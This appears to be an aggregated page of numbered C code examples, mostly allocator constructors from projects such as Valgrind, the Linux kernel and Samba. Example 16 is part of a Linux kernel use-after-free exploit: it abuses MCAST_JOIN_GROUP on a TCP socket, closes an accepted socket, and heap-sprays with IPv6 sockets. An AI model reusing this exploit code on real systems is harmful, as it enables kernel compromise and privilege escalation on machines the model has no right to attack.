Ejemplo n.º 1
0
/*{{{  static StrPoolP strpool_create(StrPoolI initial_image_allocated_size, etc. */
static StrPoolP
strpool_create (StrPoolI initial_image_allocated_size,
		StrPoolI amount_to_increase_image_allocation_by,
		void *(*alloc_fn) (size_t size, void *user_data), void (*free_fn) (void *block, size_t size, void *user_data), void *user_data)
{
	StrPoolP result;
	result = alloc_fn (sizeof (struct StrPool), user_data);
	if (result != NULL) {
		if (initial_image_allocated_size == 0)
			initial_image_allocated_size = 1;
		result->image = alloc_fn ((size_t) initial_image_allocated_size, user_data);
		if (result->image != NULL) {
			result->image_len = 1;
			result->image[0] = '\0';
			result->image_allocated_size = initial_image_allocated_size;
			result->amount_to_increase_image_allocation_by = amount_to_increase_image_allocation_by;
			result->alloc_fn = alloc_fn;
			result->free_fn = free_fn;
		} else {
			free_fn (result, sizeof (struct StrPool), user_data);
			result = NULL;
		}
	}
	return result;
}
Ejemplo n.º 2
0
/*@out@*/ RBT_ROOT *rbt_init( void *data ,
                              rbt_alloc_fn alloc_fn ,
                              rbt_free_fn free_fn ,
                              rbt_compare_keys_fn compare_keys ,
                              mm_size_t key_length ,
                              mm_size_t node_data_size )
{
  RBT_ROOT *root = alloc_fn( sizeof( RBT_ROOT ) , data ) ;

  if ( root == NULL ) {
    return NULL ;
  }

  root->node = &( root->nil ) ;
  root->nil.key = ( uintptr_t )0 ;
  root->nil.left = NULL ;
  root->nil.right = NULL ;
  root->nil.p = NULL ;
  root->nil.data = NULL ;
  root->nil.red = FALSE ;
  root->count = 0 ;
  root->compare_keys = compare_keys ;
  root->alloc_fn = alloc_fn ;
  root->free_fn = free_fn ;
  root->key_length = key_length ;
  root->node_data_size = node_data_size ;
  root->data = data ;

  return root ;
}
Ejemplo n.º 3
0
XArray* VG_(newXA) ( void*(*alloc_fn)(SizeT), 
                     void(*free_fn)(void*),
                     Word elemSzB )
{
   struct _XArray* xa;
   /* Implementation relies on Word being signed and (possibly)
      on SizeT being unsigned. */
   vg_assert( sizeof(Word) == sizeof(void*) );
   vg_assert( ((Word)(-1)) < ((Word)(0)) );
   vg_assert( ((SizeT)(-1)) > ((SizeT)(0)) );
   /* check user-supplied info .. */
   vg_assert(alloc_fn);
   vg_assert(free_fn);
   vg_assert(elemSzB > 0);
   xa = alloc_fn( sizeof(struct _XArray) );
   vg_assert(xa);
   xa->alloc     = alloc_fn;
   xa->free      = free_fn;
   xa->cmpFn     = NULL;
   xa->elemSzB   = elemSzB;
   xa->usedsizeE = 0;
   xa->totsizeE  = 0;
   xa->sorted    = False;
   xa->arr       = NULL;
   return xa;
}
Ejemplo n.º 4
0
DedupPoolAlloc* VG_(newDedupPA) ( SizeT  poolSzB,
                                  SizeT  eltAlign,
                                  void*  (*alloc_fn)(const HChar*, SizeT),
                                  const  HChar* cc,
                                  void   (*free_fn)(void*) )
{
   DedupPoolAlloc* ddpa;
   vg_assert(poolSzB >= eltAlign);
   vg_assert(poolSzB >= 100); /* let's say */
   vg_assert(poolSzB >= 10*eltAlign); /* let's say */
   vg_assert(alloc_fn);
   vg_assert(cc);
   vg_assert(free_fn);
   ddpa = alloc_fn(cc, sizeof(*ddpa));
   VG_(memset)(ddpa, 0, sizeof(*ddpa));
   ddpa->poolSzB  = poolSzB;
   ddpa->fixedSzb = 0;
   ddpa->eltAlign = eltAlign;
   ddpa->alloc_fn = alloc_fn;
   ddpa->cc       = cc;
   ddpa->free_fn  = free_fn;
   ddpa->pools    = VG_(newXA)( alloc_fn, cc, free_fn, sizeof(void*) );

   ddpa->ht_elements = VG_(HT_construct) (cc);
   ddpa->ht_node_pa = VG_(newPA) ( sizeof(ht_node),
                                   1000,
                                   alloc_fn,
                                   cc,
                                   free_fn);
   ddpa->curpool = NULL;
   ddpa->curpool_limit = NULL;
   ddpa->curpool_free = NULL;

   return ddpa;
}
Ejemplo n.º 5
0
RState* r_state_new (RAllocFunc alloc_fn, rpointer aux)
{
    RState* r;
    RState zero = { { 0 } };

    r = alloc_fn (NULL, NULL, sizeof (RState));

    if (!r)
        goto exit;

    *r = zero;

    /* Initialize memory allocator */
    r->alloc_fn = alloc_fn;
    r->alloc_aux = aux;

    /* Initialize error handling facilities */
    r->last_error = R_UNDEFINED;

    gc_init (r);

    init_builtin_types (r);
    init_global_objects (r);

    vm_init (r);
    gc_enable (r);

exit:
    return r;
}
Ejemplo n.º 6
0
XArray* VG_(newXA) ( Alloc_Fn_t alloc_fn,
                     const HChar* cc,
                     Free_Fn_t free_fn,
                     Word elemSzB )
{
   XArray* xa;
   /* Implementation relies on Word being signed and (possibly)
      on SizeT being unsigned. */
   vg_assert( sizeof(Word) == sizeof(void*) );
   vg_assert( ((Word)(-1)) < ((Word)(0)) );
   vg_assert( ((SizeT)(-1)) > ((SizeT)(0)) );
   /* check user-supplied info .. */
   vg_assert(alloc_fn);
   vg_assert(free_fn);
   vg_assert(elemSzB > 0);
   xa = alloc_fn( cc, sizeof(struct _XArray) );
   xa->alloc_fn  = alloc_fn;
   xa->cc        = cc;
   xa->free_fn   = free_fn;
   xa->cmpFn     = NULL;
   xa->elemSzB   = elemSzB;
   xa->usedsizeE = 0;
   xa->totsizeE  = 0;
   xa->sorted    = False;
   xa->arr       = NULL;
   return xa;
}
Ejemplo n.º 7
0
PoolAlloc* VG_(newPA) ( UWord  elemSzB,
                        UWord  nPerPool,
                        void*  (*alloc_fn)(const HChar*, SizeT),
                        const  HChar* cc,
                        void   (*free_fn)(void*) )
{
   PoolAlloc* pa;
   vg_assert(0 == (elemSzB % sizeof(UWord)));
   vg_assert(elemSzB >= sizeof(UWord));
   vg_assert(nPerPool >= 100); /* let's say */
   vg_assert(alloc_fn);
   vg_assert(cc);
   vg_assert(free_fn);
   pa = alloc_fn(cc, sizeof(*pa));
   VG_(memset)(pa, 0, sizeof(*pa));
   pa->nrRef    = 0;
   pa->elemSzB  = elemSzB;
   pa->nPerPool = nPerPool;
   pa->pools    = NULL;
   pa->alloc_fn = alloc_fn;
   pa->cc       = cc;
   pa->free_fn  = free_fn;
   pa->pools    = VG_(newXA)( alloc_fn, cc, free_fn, sizeof(void*) );
   pa->nextFree = NULL;

   return pa;
}
Ejemplo n.º 8
0
int __sg_alloc_table(struct sg_table *table, unsigned int nents,
		     unsigned int max_ents, gfp_t gfp_mask,
		     sg_alloc_fn *alloc_fn)
{
	struct scatterlist *sg, *prv;
	unsigned int left;

#ifndef ARCH_HAS_SG_CHAIN
	BUG_ON(nents > max_ents);
#endif

	memset(table, 0, sizeof(*table));

	left = nents;
	prv = NULL;
	do {
		unsigned int sg_size, alloc_size = left;

		if (alloc_size > max_ents) {
			alloc_size = max_ents;
			sg_size = alloc_size - 1;
		} else
			sg_size = alloc_size;

		left -= sg_size;

		sg = alloc_fn(alloc_size, gfp_mask);
		if (unlikely(!sg)) {
			if (prv)
				table->nents = ++table->orig_nents;

 			return -ENOMEM;
		}

		sg_init_table(sg, alloc_size);
		table->nents = table->orig_nents += sg_size;

		if (prv)
			sg_chain(prv, max_ents, sg);
		else
			table->sgl = sg;

		if (!left)
			sg_mark_end(&sg[sg_size - 1]);

		gfp_mask &= ~__GFP_WAIT;
		gfp_mask |= __GFP_HIGH;
		prv = sg;
	} while (left);

	return 0;
}
Ejemplo n.º 9
0
int  ci_buddy_ctor2(ci_buddy_allocator* b, unsigned order,
		    void* (*alloc_fn)(size_t), void (*free_fn)(void*))
{
  unsigned o;

  ci_assert(b);

  b->order = order;
  b->free_lists = (ci_dllist*) alloc_fn((order+1) * sizeof(ci_dllist));
  if( b->free_lists == 0 )  goto fail1;

  b->links = (ci_dllink*) alloc_fn(ci_pow2(order) * sizeof(ci_dllink));
  if( b->links == 0 )  goto fail2;

  b->orders = (ci_uint8*) alloc_fn(ci_pow2(order));
  if( b->orders == 0 )  goto fail3;

  CI_DEBUG(CI_ZERO_ARRAY(b->links, ci_pow2(order)));

  for( o = 0; o <= b->order; ++o )
    ci_dllist_init(b->free_lists + o);

  ci_dllist_push(FL(b, b->order), ADDR_TO_LINK(b, 0));
  ci_assert(b->order < 255);	
  b->orders[0] = (ci_uint8)b->order;

  ci_assert(!IS_BUSY(b, LINK_TO_ADDR(b, ci_dllist_head(FL(b, b->order)))));

  return 0;

 fail3:
  free_fn(b->links);
 fail2:
  free_fn(b->free_lists);
 fail1:
  return -ENOMEM;
}
Ejemplo n.º 10
0
int prealloc_buffers(struct vdisk_dev *dev)
{
	int i, c, res = 0;

	if (sgv_disable_clustered_pool)
		c = 0;
	else
		c = 1;

	do {
		for (i = 0; i < prealloc_buffers_num; i++) {
			union scst_user_prealloc_buffer pre;

			memset(&pre, 0, sizeof(pre));
			pre.in.pbuf = (unsigned long)alloc_fn(prealloc_buffer_size);
			pre.in.bufflen = prealloc_buffer_size;
			pre.in.for_clust_pool = c;

			if (pre.in.pbuf == 0) {
				res = errno;
				PRINT_ERROR("Unable to prealloc buffer: %s",
					strerror(res));
				goto out;
			}

			res = ioctl(dev->scst_usr_fd, SCST_USER_PREALLOC_BUFFER, &pre);
			if (res != 0) {
				res = errno;
				PRINT_ERROR("Unable to send prealloced buffer: %s",
					strerror(res));
				free((void *)(unsigned long)pre.in.pbuf);
				goto out;
			}
			TRACE_MEM("Prealloced buffer cmd_h %x", pre.out.cmd_h);
		}
		c--;
	} while (c >= 0);

out:
	return res;
}
Ejemplo n.º 11
0
struct smb_signing_state *smb_signing_init_ex(TALLOC_CTX *mem_ctx,
					      bool allowed,
					      bool desired,
					      bool mandatory,
					      void *(*alloc_fn)(TALLOC_CTX *, size_t),
					      void (*free_fn)(TALLOC_CTX *, void *))
{
	struct smb_signing_state *si;

	if (alloc_fn) {
		void *p = alloc_fn(mem_ctx, sizeof(struct smb_signing_state));
		if (p == NULL) {
			return NULL;
		}
		memset(p, 0, sizeof(struct smb_signing_state));
		si = (struct smb_signing_state *)p;
		si->mem_ctx = mem_ctx;
		si->alloc_fn = alloc_fn;
		si->free_fn = free_fn;
	} else {
		si = talloc_zero(mem_ctx, struct smb_signing_state);
		if (si == NULL) {
			return NULL;
		}
	}

	if (mandatory) {
		desired = true;
	}

	if (desired) {
		allowed = true;
	}

	si->allowed = allowed;
	si->desired = desired;
	si->mandatory = mandatory;

	return si;
}
Ejemplo n.º 12
0
/*
 * Create a new NDL3Net object. Stored alloc_fn and free_fn, which will be
 * passed userdata in later calls.
 */
NDL3Net * NDL3_new(NDAlloc alloc_fn, NDFree free_fn, void * userdata) {
  if (alloc_fn == NULL) {
    alloc_fn = &ND_malloc;
  }
  if (free_fn == NULL) {
    free_fn = &ND_free;
  }
  NDL3Net * net = (NDL3Net *) alloc_fn(sizeof(NDL3Net), userdata);
  if (net == 0) {
    return 0;
  }
  for (int i = 0; i < NDL3_MAXPORTS; i++) {
    net->ports[i].num = 0;
  }
  net->userdata = userdata;
  net->alloc = alloc_fn;
  net->free = free_fn;
  net->time = 0;
  net->port_idx_last_serviced = 0;
  net->last_error = 0;
  return net;
}
Ejemplo n.º 13
0
/*{{{  ProfTab * proftab_create(BIT32 version, etc. */
ProfTab *proftab_create (ProfTabContents contents,
		void *alloc_fn (size_t size, void *user_data), void free_fn (void *block, size_t size, void *user_data), void *user_data)
{
	ProfTab *table = (ProfTab *) alloc_fn (sizeof (ProfTab), user_data);
	table->alloc_fn = alloc_fn;
	table->free_fn = free_fn;
	table->user_data = user_data;
	table->contents = contents;
	table->count_table_size = 0;
	table->strpool = strpool_create (PROFTAB_INITIAL_STRPOOL_SIZE, PROFTAB_STRPOOL_SIZE_INCREMENT, alloc_fn, free_fn, user_data);
	table->entry_list_head = NULL;
	table->entry_list_tail = NULL;
	if (cgraph_profiling || sampling_profiling) {
		int i;
		RoutineInfoEntry **hash_table;
		table->rout_hash_table = memalloc (ROUTINE_INFO_HASH_TABLE_SIZE * sizeof (table->rout_hash_table));
		hash_table = table->rout_hash_table;

		for (i = 0; i < ROUTINE_INFO_HASH_TABLE_SIZE; i++)
			hash_table[i] = NULL;
	} else
		table->rout_hash_table = NULL;
	return table;
}
Ejemplo n.º 14
0
RangeMap* VG_(newRangeMap) ( void*(*alloc_fn)(const HChar*,SizeT), 
                             const HChar* cc,
                             void(*free_fn)(void*),
                             UWord initialVal )
{
   /* check user-supplied info .. */
   vg_assert(alloc_fn);
   vg_assert(free_fn);
   RangeMap* rm = alloc_fn(cc, sizeof(RangeMap));
   rm->alloc_fn = alloc_fn;
   rm->cc       = cc;
   rm->free_fn  = free_fn;
   rm->ranges = VG_(newXA)( alloc_fn, cc, free_fn, sizeof(Range) );
   /* Add the initial range */
   Range r;
   r.key_min = UWORD_MIN;
   r.key_max = UWORD_MAX;
   r.val     = initialVal;
   Word i = VG_(addToXA)(rm->ranges, &r);
   vg_assert(i == 0);
   vg_assert(VG_(sizeXA)(rm->ranges) == 1);
   /* */
   return rm;
}
Ejemplo n.º 15
0
/**
 * __sg_alloc_table - Allocate and initialize an sg table with given allocator
 * @table:	The sg table header to use
 * @nents:	Number of entries in sg list
 * @max_ents:	The maximum number of entries the allocator returns per call
 * @gfp_mask:	GFP allocation mask
 * @alloc_fn:	Allocator to use
 *
 * Description:
 *   This function returns a @table @nents long. The allocator is
 *   defined to return scatterlist chunks of maximum size @max_ents.
 *   Thus if @nents is bigger than @max_ents, the scatterlists will be
 *   chained in units of @max_ents.
 *
 * Notes:
 *   If this function returns non-0 (eg failure), the caller must call
 *   __sg_free_table() to cleanup any leftover allocations.
 *
 **/
int __sg_alloc_table(struct sg_table *table, unsigned int nents,
		     unsigned int max_ents, gfp_t gfp_mask,
		     sg_alloc_fn *alloc_fn)
{
	struct scatterlist *sg, *prv;
	unsigned int left;
	unsigned int total_alloc = 0;

#ifndef ARCH_HAS_SG_CHAIN
	BUG_ON(nents > max_ents);
#endif

	memset(table, 0, sizeof(*table));

	left = nents;
	prv = NULL;
	do {
		unsigned int sg_size, alloc_size = left;

		if (alloc_size > max_ents) {
			alloc_size = max_ents;
			sg_size = alloc_size - 1;
		} else
			sg_size = alloc_size;

		left -= sg_size;

		sg = alloc_fn(alloc_size, gfp_mask);
		if (unlikely(!sg)) {
			table->orig_nents = total_alloc;
			/* mark the end of previous entry */
			sg_mark_end(&prv[alloc_size - 1]);
			return -ENOMEM;
		}

		total_alloc += alloc_size;

		sg_init_table(sg, alloc_size);
		table->nents = table->orig_nents += sg_size;

		/*
		 * If this is the first mapping, assign the sg table header.
		 * If this is not the first mapping, chain previous part.
		 */
		if (prv)
			sg_chain(prv, max_ents, sg);
		else
			table->sgl = sg;

		/*
		 * If no more entries after this one, mark the end
		 */
		if (!left)
			sg_mark_end(&sg[sg_size - 1]);

		/*
		 * only really needed for mempool backed sg allocations (like
		 * SCSI), a possible improvement here would be to pass the
		 * table pointer into the allocator and let that clear these
		 * flags
		 */
		gfp_mask &= ~__GFP_WAIT;
		gfp_mask |= __GFP_HIGH;
		prv = sg;
	} while (left);

	return 0;
}
Ejemplo n.º 16
0
void *free_fn(void *arg)
{
    int sockfd, i;

    struct sockaddr_in s = { 
        .sin_family = AF_INET, 
        .sin_port = htons(PORT),
        .sin_addr = inet_addr("127.0.0.1"),
    };
    printf("[+] %s()\n", __func__);
    printf("%s(), getpid : %d, gettid() : %d\n", __func__, getpid(), gettid());

    while(!server_init)
        usleep(1);
    // nanosleep({tv_sec=0, tv_nsec=1000}, NULL) = 0  
#define connect_times 2
    for ( i = 0 ; i < connect_times ; i++ )//while(1)
    {
        sockfd = socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_IP);

        //printf("%s(), sockfd : %d\n", __func__, sockfd);
        if (connect(sockfd, (struct sockaddr*)&s, sizeof s ) == 0 ) {
            printf("[+] %d-th client connected successfully...\n", i);
            if ( close(sockfd) != 0 )
                err(-1, "%s(), close(sockfd)\n", __func__);
            
            client_finish=true;
        }    
    }   
    pthread_exit(0);
}

int ser_sockfd;

void *alloc_fn(void *arg)
{
    struct group_req req;
    int ret, i;         // file descriptor for socket
    struct sockaddr_in gg = { 
        .sin_family = AF_INET, 
        .sin_port = htons(PORT),
        .sin_addr = inet_addr("224.0.0.0"), // multicast address
    };
    printf("%s(), getpid : %d, gettid() : %d\n", __func__, getpid(), gettid());

    ser_sockfd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC , IPPROTO_IP);

    req.gr_interface = 1;
    memcpy(&req.gr_group, &gg, sizeof gg);

    if (setsockopt(ser_sockfd, SOL_IP, MCAST_JOIN_GROUP, &req, sizeof req) == -1)
        warn("setsockopt(SO_REUSEADDR)");

    bind(ser_sockfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr));

    listen(ser_sockfd, 2);
    
    pthread_t free1_t;
    // Create a client thread to connect.
    if ( pthread_create(&free1_t, NULL, free_fn, NULL))
        err(1, "free1_t");

    server_init = true;

    int addr_len = sizeof serv_addr;
#define accept_times 2
    for ( i = 0 ; i < accept_times ; i++ )
    {
        conntfd[i] = accept4(ser_sockfd, NULL, NULL, 0);
        
        if ( conntfd[i] >= 0 ) 
                printf("[+] %d-th accept() has have executed...\n", i);
        else 
            err(-1, "accept");
    }   
    while ( client_finish == false );
    server_finish=true;

    int c, times = 0;
    for ( c = 0 ; c < 30 ; c++, times = 0 ) {  
        while(prepare_spray_obj(
                    ipv6_fd[c], 
                    &gr_spray, 
                    &in6_spray, 
                    times++) == 0
        );
    }
    bind_cpu_on(cpuid);
    bind_cpu_on(cpuid);

    // close (conntfd[0]) cause by accept4()
    // Trigger kernel after defrag spray.
    if ( conntfd[0] ) 
        close(conntfd[0]);
    else 
        err(-1, "close(conntfd[0])");

    for ( c = 0 ; c < defrag_num ; c++ ) {
       if ( close(ipv6_fd[c]) != 0) 
               err(-1, "close(ipv6_fd[%d] = %d)", c, ipv6_fd[c]);
    }
    
#if real_spray
    
    for ( c = 0 ; c < spray_times ; c++, times = 0 ) {
        while(prepare_spray_obj(
            ipv6_fd_500[c],
            &gr_spray,
            &in6_spray,
            times++) == 0
        );
    }
    printf("[*] spray for the hole... %d times\n", spray_times);
#endif 
    return NULL;

}

static int trigger()
{
    pthread_t alloc_t, free1_t, free2_t;
    int sockfd;
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(PORT);
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    int i, times = 1;

    alloc_fn(NULL);

    bind_cpu_on(cpuid);
    printf("[+] Current cpu : %d After triggered and sprayed 500 times.\n", cpuid);
#if FORKCHILD
    printf("[*] kill chilren by fork()?\n");
    for ( i = 0 ; i < children_num ; i++ )
    {
        printf("kill pid : %d\n", child[i]);
        kill(child[i], SIGKILL);
    }
    wait(NULL);
#endif 

    printf("[+] All killed\n");

    return 0;
}
int bind_cpu_on(int cpuid) 
{
    int i,now_cpuid = -1;
    /*
    if ( cpuid > sysconf(_SC_NPROCESSORS_CONF) -1 )
        err(-1,"cpuid is over...");
    */
    cpu_set_t get;
    CPU_ZERO(&mask);
    CPU_SET(cpuid, &mask);
    if (cpuid == 7)
        return sched_setaffinity(0 /* pid self */, sizeof(mask), &mask);

    while( cpuid != now_cpuid ) {
        sched_setaffinity(0 /* pid self */, sizeof(mask), &mask);
        now_cpuid = sched_getcpu();
    }
    return now_cpuid;
}
Ejemplo n.º 17
0
/**
 * __sg_alloc_table - Allocate and initialize an sg table with given allocator
 * @table:	The sg table header to use
 * @nents:	Number of entries in sg list
 * @max_ents:	The maximum number of entries the allocator returns per call
 * @gfp_mask:	GFP allocation mask
 * @alloc_fn:	Allocator to use
 *
 * Description:
 *   This function returns a @table @nents long. The allocator is
 *   defined to return scatterlist chunks of maximum size @max_ents.
 *   Thus if @nents is bigger than @max_ents, the scatterlists will be
 *   chained in units of @max_ents.
 *
 * Notes:
 *   If this function returns non-0 (eg failure), the caller must call
 *   __sg_free_table() to cleanup any leftover allocations.
 *
 **/
int __sg_alloc_table(struct sg_table *table, unsigned int nents,
		     unsigned int max_ents, gfp_t gfp_mask,
		     sg_alloc_fn *alloc_fn)
{
	struct scatterlist *sg, *prv;
	unsigned int left;

#ifndef ARCH_HAS_SG_CHAIN
	if (WARN_ON_ONCE(nents > max_ents))
		return -EINVAL;
#endif

	memset(table, 0, sizeof(*table));

	left = nents;
	prv = NULL;
	do {
		unsigned int sg_size, alloc_size = left;

		if (alloc_size > max_ents) {
			alloc_size = max_ents;
			sg_size = alloc_size - 1;
		} else
			sg_size = alloc_size;

		left -= sg_size;

		sg = alloc_fn(alloc_size, gfp_mask);
		if (unlikely(!sg)) {
			/*
			 * Adjust entry count to reflect that the last
			 * entry of the previous table won't be used for
			 * linkage.  Without this, sg_kfree() may get
			 * confused.
			 */
			if (prv)
				table->nents = ++table->orig_nents;

 			return -ENOMEM;
		}

		sg_init_table(sg, alloc_size);
		table->nents = table->orig_nents += sg_size;

		/*
		 * If this is the first mapping, assign the sg table header.
		 * If this is not the first mapping, chain previous part.
		 */
		if (prv)
			sg_chain(prv, max_ents, sg);
		else
			table->sgl = sg;

		/*
		 * If no more entries after this one, mark the end
		 */
		if (!left)
			sg_mark_end(&sg[sg_size - 1]);

		prv = sg;
	} while (left);

	return 0;
}